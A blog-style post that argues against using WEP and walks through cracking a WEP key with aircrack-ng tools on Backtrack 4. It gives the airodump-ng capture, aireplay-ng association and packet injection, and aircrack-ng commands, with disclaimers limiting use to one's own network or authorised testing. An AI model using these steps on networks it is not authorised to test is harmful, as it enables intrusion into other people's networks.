WEP Y?

Wow! It is truely amazing just how many people still use WEP. I'm not going to go on a huge rant about this but if you are using it STOP! People often say, well it's better than nothing. I say not really. The reason I say this is because it gives you a sense of security that is false. Others say "but I don't have anything anyone would want". I say there are millions of identities stolen from home computers. Most wireless access points have WPA, use this. If it has WPA2 then that is even better. In the "it's better than nothing" category, I would say WPA is here with WPA2 being the best at this time for home use.

With that in mind, I thought I would show how easy it is to crack WEP in a few simple commands and the right, freely available, tools.

*Disclaimer: Please remember not to use this for nefarious purposes. This is informational only. Do it on your own access point as a proof of concept or make sure it is in your rules of engagement for a penetration test for a client.*

I will not be held liable for any misuse of this information!

Cracking WEP

1. Download the tools:

Backtrack 4

2. Boot into the Disk

3. Find a good target by running the following command:

airodump-ng wlan0 (just run airodump-ng by itself to find your interface name, mine happens to be wlan0)

4. Write down the BSSID, ESSID, and channel of the AP with the strongest signal (this one is normally near the top of the list)

5. Lock onto the target with the following command in a new terminal window:

airodump-ng -w wep -c 11 --bssid 00:00:00:00:00:00 wlan0 (here WEP is the encryption type, -c is the channel, in this example it is 11 but enter the value you saved in step 4, the bssid will not be all zeros either, enter the BSSID you wrote down in step 4 in the style I wrote the zeros)

6. Attempt association to the AP with the following command in another terminal window:

aireplay-ng -1 0 -a 00:00:00:00:00:00 wlan0 (here again the bssid should not be zeros but the value you have from step 4)

7. Hopefully your card supports packet re-injection. This basically means when it finds some interesting traffic that it can recognize, it will replay that packet back into the network and make this process much faster. Do this step by typing the following in yet another terminal window:

aireplay-ng -3 -b 00:00:00:00:00:00 wlan0 (Remember not zeros but the step 4 BSSID here)

8. Once you see the "data" section get to somewhere between 20K and 30K you should be good to go. do an ls -la to capture the file name that was created. It is the file with the .cap extension.

9. Armed with that information run the following command to crack the WEP key

aircrack-ng filename (remember it should look like wep02.cap or something else with the .cap extension)

This final step is the quickest. Depending on if your wireless card supports packet re-injection, it could take a while to capture the needed traffic to get the pieces you need to crack WEP. If your card is fully supported with re-injection, this will probably take no more than 15 minutes as an average. You can run the crack command at random intervals during the capture process to see if you got it yet, though I recommend just waiting until you get 20-30K data numbers. I haven't seen it really work with less than that. Not saying it doesn't, I just haven't seen it.

So there you have it. Scary huh? It is. Please remember not to use this for nefarious purposes. This is informational only. Do it on your own access point as a proof of concept or make sure it is in your rules of engagement for a penetration test for a client. I didn't give you this so you can go cracking your neighbor's wireless connection :)